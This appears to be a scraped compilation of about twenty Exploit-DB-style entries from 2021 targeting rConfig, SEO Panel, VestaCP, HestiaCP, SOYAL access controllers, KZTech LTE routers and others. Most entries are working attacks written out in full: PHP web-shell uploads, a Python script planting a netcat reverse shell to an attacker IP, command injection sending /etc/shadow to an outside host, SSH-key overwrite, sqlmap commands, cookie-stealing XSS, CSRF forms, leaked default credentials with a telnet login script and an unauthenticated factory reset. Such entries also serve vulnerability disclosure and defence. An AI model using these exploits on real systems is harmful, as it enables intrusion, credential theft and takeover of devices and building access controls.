ISHACK AI BOT

# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1) # Date: 2021-03-17 # Exploit Author: Murat ŞEKER # Vendor Homepage: https://www.rconfig.com # Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip # Version: rConfig v3.9.6 # Install scripts : # https://www.rconfig.com/downloads/scripts/install_rConfig.sh # https://www.rconfig.com/downloads/scripts/centos7_install.sh # https://www.rconfig.com/downloads/scripts/centos6_install.sh # Tested on: centOS 7 # Notes : If you want to reproduce in your lab environment follow those links : # http://help.rconfig.com/gettingstarted/installation # then # http://help.rconfig.com/gettingstarted/postinstall # Description: rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'. The following steps can be carried out in duplicating this vulnerability. - Login the rConfig application with your credentials. - Repeat POST /lib/crud/vendors.crud.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254 Content-Length: 36619 Origin: https://localhost Connection: close Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b Upgrade-Insecure-Requests: 1 Cache-Control: no-transform -----------------------------122590832918963661283831488254 Content-Disposition: form-data; name="vendorName" thisisrce -----------------------------122590832918963661283831488254 Content-Disposition: form-data; name="vendorLogo"; filename="file.php" Content-Type: image/png <?php phpinfo(); ?> -----------------------------122590832918963661283831488254 Content-Disposition: form-data; name="add" add -----------------------------122590832918963661283831488254 Content-Disposition: form-data; name="editid" -----------------------------122590832918963661283831488254-- - Than go to http(s)://<SERVER>/images/vendor/file.php Note: The file.php can be accessed without valid credentials. If you change the <?php phpinfo(); ?> to <?php echo $_GET["cmd"];?> and navigate the http(s)://<SERVER>/images/vendor/file.php?cmd=id The `id` command will execute on server.

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1) # Date: 17/02/2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.seopanel.org/ # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0 # Version: 4.8.0 # Reference - https://github.com/seopanel/Seo-Panel/issues/209 Step 1 - Login to the SEO Panel with admin credentials. Step 2 - Go to archive.php Step 3 - Change "order_col" value to "*" and copy the request Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL --dbs --technique=T --flush-session

# Exploit Title: LiveZilla Server 8.0.1.0 - 'Accept-Language' Reflected XSS # Google Dork: inurl: inurl:/mobile/index.php intitle:LiveZilla # Date: 18 Mars 2021 # Exploit Author: Clément Cruchet # Vendor Homepage: https://www.livezilla.net # Software Link: https://www.livezilla.net/downloads/en/ # Version: LiveZilla Server 8.0.1.0 and before # Tested on: Windows/Linux # CVE : CVE-2019-12962 GET /mobile/index.php HTTP/1.1 Host: chat.website.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0) Gecko/20100101 Firefox/86.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ';alert(document.cookie)// Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1

# Title: Hestia Control Panel 1.3.2 - Arbitrary File Write # Date: 07.03.2021 # Author: Numan Türle # Vendor Homepage: https://hestiacp.com/ # Software Link: https://github.com/hestiacp/hestiacp # Version: < 1.3.3 # Tested on: HestiaCP Version 1.3.2 curl --location --request POST 'https://TARGET:8083/api/index.php' \ --form 'hash="HERE_API_KEY"' \ --form 'returncode="yes"' \ --form 'cmd="v-make-tmp-file"' \ --form 'arg1="ssh-rsa HERE_KEY"' \ --form 'arg2="/home/admin/.ssh/authorized_keys"' \ --form 'arg3=""' \ --form 'arg4=""' \ --form 'arg5=""'

# Exploit Title: Plone CMS 5.2.3 - 'Title' Stored XSS # Date: 18-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://plone.com/ # Software Link: https://github.com/plone/Products.CMFPlone/tags # Version: 5.2.3 # Tested on: Windows 10 # Reference - https://github.com/plone/Products.CMFPlone/issues/3255 Steps to reproduce the issue: 1- Goto https://localhost/ where Plone 5.2.3 version is installed. 2- Click on "Log in now" and Login as "Manager" 3- Navigate to Manager=>Site Setup=>Site 4- Edit "Site title" field to "xyz<ScRiPt>alert(1)</ScRiPt>"

# Exploit Title: Boonex Dolphin 7.4.2 - 'width' Stored XSS # Date: 18-03-2021 # Exploit Author: Piyush Patil # Vendor Homepage: https://www.boonex.com/ # Software Link: https://www.boonex.com/downloads # Version: 7.4.2 # Tested on: Windows 10 # Reference - https://github.com/xoffense/POC/blob/main/Boonex%20Dolphin%20CMS%207.4.2%20%20stored%20XSS Steps to Reproduce Bug: 1- Login to Admin Panel 2- Goto "Builders" => "Pages Builder" 3- Select any page 4- Turn on Burp Suite Intercept and Change "other pages width" to "1081px</script><script>alert(document.cookie)</script>"

# Exploit Title: BRAdmin Professional 3.75 - 'BRA_Scheduler' Unquoted Service Path # Date: 2021-03-17 # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://global.brother/ # Software Link: https://support.brother.com/g/b/downloadend.aspx?c=us&lang=en&prod=hls7000dn_us_eu_as&os=10013&dlid=dlf005042_000&flang=4&type3=26 # Version: 3.75.0000 # Tested on: Windows 10 # Source: https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path #Description: This software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices. If a user can insert a executable which is called as "BRAdmin" under the "C:\Program Files (x86)\Brother\" , local system privileges could be obtained by the user. #Detection of unquoted service path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """ Brother BRAdminPro Scheduler BRA_Scheduler C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe Auto C:\>sc qc BRA_Scheduler [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BRA_Scheduler TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Brother BRAdminPro Scheduler DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: Profiling System for Human Resource Management 1.0 - Remote Code Execution (Unauthenticated) # Date: 19-03-2021 # Exploit Author: Christian Vierschilling # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html # Software Download: https://www.sourcecodester.com/download-code?nid=11222&title=Profiling+System+For+Human+Resource+Management+using+PHP%2FPDO+with+Source+Code # Version: 1.0 # Tested on: PHP 7.4.14, Linux x64_x86 # --- Description --- # # The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. # --- Proof of concept --- # #!/usr/bin/python3 import random import sys import requests from requests_toolbelt.multipart.encoder import MultipartEncoder def file_upload(target_ip, attacker_ip, attacker_port): random_number = str(random.randint(100000000,999999999)) file_name = random_number + "shell.php" revshell_string = '<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f"); ?>'.format(attacker_ip, attacker_port) m = MultipartEncoder(fields={'upload': '', 'per_file': (file_name, revshell_string, 'application/x-php')}) print("(+) Uploading php reverse shell file ..") r1 = requests.post('http://{}/ProfilingSystem/add_file_query.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) if not "Sorry, there was an error uploading your file." in r1.text: print("(+) File uploaded to: http://{}/ProfilingSystem/uploads/{}".format(target_ip,file_name)) return file_name else: print("(-) Oh noes, error occured while uploading the file.. quitting!") exit() def trigger_shell(target_ip, target_file_name): url = 'http://{}/ProfilingSystem/uploads/{}'.format(target_ip, target_file_name) print("(+) Now trying to trigger our shell..") r2 = requests.get(url) if r2.status_code != 200: print("(-) Oh noes, we can't reach the uploaded file.. did it upload correctly?! Quitting!") exit() else: return None def main(): if len(sys.argv) != 4: print('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) print('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) sys.exit(-1) print("--- Exploiting today: Profiling System for Human Resource Management 1.0 ---") print("----------------------------------------------------------------------------") target_ip = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] target_file_name = file_upload(target_ip, attacker_ip, attacker_port) trigger_shell(target_ip, target_file_name) print("(+) done!") if __name__ == "__main__": main()

# Title: VestaCP 0.9.8 - 'v_sftp_licence' Command Injection # Date: 17.03.2021 # Author: Numan Türle # Vendor Homepage: https://vestacp.com # Software Link: https://myvestacp.com < 0.9.8-26-43 # Software Link: https://vestacp.com < 0.9.8-26 POST /edit/server/ HTTP/1.1 Host: TARGET:8083 Connection: close Content-Length: 6633 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded User-Agent: USER_AGENT Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: en,tr-TR;q=0.9,tr;q=0.8,en-US;q=0.7,el;q=0.6,zh-CN;q=0.5,zh;q=0.4 Cookie: PHPSESSID=HERE_COOKIE sec-gpc: 1 token=149e2b8c201fd88654df6fd694158577&save=save&v_hostname=1338.example.com&v_timezone=Europe%2FIstanbul&v_language=en&v_mail_url=&v_mail_ssl_domain=&v_mysql_url=&v_mysql_password=&v_backup=yes&v_backup_gzip=5&v_backup_dir=%2Fbackup&v_backup_type=ftp&v_backup_host=&v_backup_username=&v_backup_password=&v_backup_bpath=&v_web_ssl_domain=&v_sys_ssl_crt=privatekeyblablabla&v_quota=no&v_firewall=no&v_sftp=yes&v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow&v_filemanager=no&v_filemanager_licence=&v_softaculous=yes&save=Save Parameter : v_sftp_licence=1 1337.burpcollaborator.net -o /etc/shadow

# Exploit Title: Eclipse Mosquitto MQTT broker 2.0.9 - 'mosquitto' Unquoted Service Path # Discovery by: Riadh Bouchahoua # Discovery Date: 19-03-2021 # Vendor Homepage: https://mosquitto.org/ # Software Links : https://mosquitto.org/download/ # Tested Version: 2.0.9 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 64 bits # Step to discover Unquoted Service Path: ==== C:\Users\Admin>wmic service get name,pathname,startmode |findstr /i /v "C:\Windows\\" |findstr "mosquitto" mosquitto C:\Program Files\mosquitto\mosquitto.exe run ==== C:\Users\Admin>sc qc mosquitto [SC] QueryServiceConfig réussite(s) SERVICE_NAME: mosquitto TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\mosquitto\mosquitto.exe run LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Mosquitto Broker DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: CouchCMS 2.2.1 - SSRF via SVG file upload # Date: 2021-01-25 # Exploit Author: xxcdd # Vendor Homepage: https://github.com/CouchCMS/CouchCMS # Software Link: https://github.com/CouchCMS/CouchCMS # Version: v2.2.1 # Tested on: Windows 7 An issue was discovered in CouchCMS v2.2.1 (https://github.com/CouchCMS/CouchCMS/issues/130) that allows SSRF via an /couch/includes/kcfinder/browse.php SVG upload. upload url is :/couch/includes/kcfinder/browse.php?nonce=[yournonce]&type=file&CKEditor=f_main_content&CKEditorFuncNum=1&langCode=en ssrf.svg content: <?xml version="1.0" encoding="UTF-8" standalone="no"?> <svg xmlns:svg="http://www.w3.org/2000/svg" xmlns=" http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"> <image height="200" width="200" xlink:href="http://<test_ip>:1234" /> </svg>

# Exploit Title: SOYAL Biometric Access Control System 5.0 - Master Code Disclosure # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: AR-727 i/CM - F/W: 5.0 AR837E/EF - F/W: 4.3 AR725Ev2 - F/W: 4.3 191231 AR331/725E - F/W: 4.2 AR837E/EF - F/W: 4.1 AR-727CM /i - F/W: 4.09 AR-727CM /i - F/W: 4.06 AR-837E - F/W: 3.03 Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings. Desc: The controller suffers from a cleartext transmission of sensitive information. This allows interception of the HTTP traffic and disclose the Master code and the Arming code via a man-in-the-middle attack. An attacker can obtain these codes to enter into the controller's Programming mode and bypass physical security controls in place. Tested on: SOYAL Technology WebServer 2.0 SOYAL Serial Device Server 4.03A SOYAL Serial Device Server 4.01n SOYAL Serial Device Server 3.07n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5630 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5630.php 25.01.2021 -- $ curl 'http://192.168.1.1/CtrlParam.htm' \ -H 'Authorization: Basic YWRtaW46' | \ grep -ni -B1 'masterCode\|armCode' <td><font face="Arial,Helvetica">Master Code (6 Digital) </font></td> <td colspan="2"><input type=text name="masterCode" size=6 maxlength=6 value=123456></td></tr> <td>Arming Code (4 Digital) </td> <td colspan="2"><input type=text name="armCode" size=4 maxlength=4 value=1234></td></tr>

# Exploit Title: SOYAL 701 Server 9.0.1 - Insecure Permissions # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: 9.0.1 190322 8.0.6 181227 Summary: 701 Server is the program used to set up and configure LAN and IP based access control systems, from the COM port used to the quantity and type of controllers connected. It is also used for programming some of the more complex controllers such as the AR-716E and the AR-829E. Desc: The application suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Everyone' and 'Authenticated Users' group. Tested on: Microsoft Windows 10 Enterprise Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5633 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5633.php 25.01.2021 -- C:\Program Files (x86)\701Server>cacls McuServer.exe C:\Program Files (x86)\701Server\McuServer.exe Everyone:F NT AUTHORITY\Authenticated Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R C:\Program Files (x86)\701Server>

# Exploit Title: SOYAL Biometric Access Control System 5.0 - 'Change Admin Password' CSRF # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: AR-727 i/CM - F/W: 5.0 AR837E/EF - F/W: 4.3 AR725Ev2 - F/W: 4.3 191231 AR331/725E - F/W: 4.2 AR837E/EF - F/W: 4.1 AR-727CM /i - F/W: 4.09 AR-727CM /i - F/W: 4.06 AR-837E - F/W: 3.03 Summary: Soyal Access systems are built into Raytel Door Entry Systems and are providing access and lift control to many buildings from public and private apartment blocks to prestigious public buildings. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: SOYAL Technology WebServer 2.0 SOYAL Serial Device Server 4.03A SOYAL Serial Device Server 4.01n SOYAL Serial Device Server 3.07n Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5632 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5632.php 25.01.2021 -- <html> <body> <form action="http://192.168.1.1/userset.cgi" method="POST"> <input type="hidden" name="pw" value="test123" /> <input type="hidden" name="pw2" value="test123" /> <input type="submit" value="Forge me!" /> </form> </body> </html> ... <html> <body> <form action="http://192.168.1.2/LoginUser.cgi" method="POST"> <input type="hidden" name="pw" value="drugtest123" /> <input type="hidden" name="pw2" value="drugtest123" /> <input type="submit" value="Forge me!" /> </form> </body> </html>

# Exploit Title: SOYAL 701 Client 9.0.1 - Insecure Permissions # Date: 25.01.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.soyal.com.tw https://www.soyal.com Vendor: SOYAL Technology Co., Ltd Product web page: https://www.soyal.com.tw | https://www.soyal.com Affected version: 9.0.1 190410 9.0.1 190115 Summary: 701 Client is the user interface software for the access control system. It is used for adding and deleting tokens, setting door groups for access, setting time zones for limiting access and monitoring ingress and egress on a live system, among other things. Desc: The application suffers from an elevation of privileges vulnerability which can be used by a simple authenticated user that can change the executable file with a binary of choice. The vulnerability exist due to the improper permissions, with the 'F' flag (Full) for 'Authenticated Users' group. Tested on: Microsoft Windows 10 Enterprise Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5634 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5634.php 25.01.2021 -- C:\Program Files (x86)\701Client>cacls client.exe C:\Program Files (x86)\701Client\client.exe NT AUTHORITY\Authenticated Users:F NT AUTHORITY\Authenticated Users:(ID)F NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R C:\Program Files (x86)\701Client>

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The application suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'pingAddr' HTTP POST parameter bypassing the injection protection filter. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5635 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php 03.02.2021 -- #JT3300V/AM3300V lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ -H "Cookie: kz_userid=admin:311139" \ -H "X-Requested-With: XMLHttpRequest" ping: bad address 'Linux' lqwrm@metalgear:~/prive$ #JT3500V lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \ -H "X-Requested-With: XMLHttpRequest" ping: bad address 'Linux' lqwrm@metalgear:~/prive$

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker can disclose sensitive and clear-text information resulting in authentication bypass by downloading the configuration of the device and revealing the admin password. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5636 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php 03.02.2021 -- $ curl -s \ -o configtest.zlib \ # Default: config.dat 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \ binwalk -e configtest.zlib ; \ cd _configtest.zlib_extracted ; \ strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \ # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device cd .. 3:Login=admin 4:Password=neotelwings 5:TelnetPwd=root123 6:GuestId=user 7:GuestPassword=user123 89:DDNSPassword= 239:auto_update_password= 279:Tr069_Password= 288:Tr069_ConnectionRequestPassword=admin 300:Tr069_STUNPassword= 339:telnetManagement=2 $

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device utilizes hard-coded credentials within its Linux distribution image. These sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the router. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5637 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php 03.02.2021 -- Default web creds: ------------------ admin:admin123 user:user123 Telnet/SSH access: ------------------ admin:root123 === import telnetlib host="192.168.1.1" user="admin" password="root123" s=telnetlib.Telnet(host) s.read_until(b"CPE login: ") s.write(user.encode('ascii') + b"\n") s.read_until(b"Password: ") s.write(password.encode('ascii') + b"\n") s.write(b"busybox\n") print(s.read_all().decode('ascii')) s.mt_interact() s.close()

# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) # Date: 03.02.2021 # Exploit Author: LiquidWorm # Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk http://www.jatontec.com/products/show.php?itemid=258 http://www.jatontech.com/CAT12.html#_pp=105_564 http://www.kzbtech.com/AM3300V.html https://neotel.mk/ostanati-paketi-2/ Affected version: Model | Firmware -------|--------- JT3500V | 2.0.1B1064 JT3300V | 2.0.1B1047 AM6200M | 2.0.0B3210 AM6000N | 2.0.0B3042 AM5000W | 2.0.0B3037 AM4200M | 2.0.0B2996 AM4100V | 2.0.0B2988 AM3500MW | 2.0.0B1092 AM3410V | 2.0.0B1085 AM3300V | 2.0.0B1060 AM3100E | 2.0.0B981 AM3100V | 2.0.0B946 AM3000M | 2.0.0B21 KZ7621U | 2.0.0B14 KZ3220M | 2.0.0B04 KZ3120R | 2.0.0B01 Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi & VoIP CPE product specially designed to enable quick and easy LTE fixed data service deployment for residential and SOHO customers. It provides high speed LAN, Wi-Fi and VoIP integrated services to end users who need both bandwidth and multi-media data service in residential homes or enterprises. The device has 2 Gigabit LAN ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing and firewall software for security. It provides an effective all-in-one solution to SOHO or residential customers. It can deliver up to 1Gbps max data throughput which can be very competitive to wired broadband access service. Desc: The device allows unauthenticated attackers to visit the unprotected /goform/LoadDefaultSettings endpoint and reset the device to its factory default settings. Once the GET request is made, the device will reboot with its default settings allowing the attacker to bypass authentication and take full control of the system. Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN Linux 2.6.36+ (mips) Mediatek APSoC SDK v4.3.1.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5642 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php 03.02.2021 -- $ curl -sk https://192.168.1.1/goform/LoadDefaultSettings success $

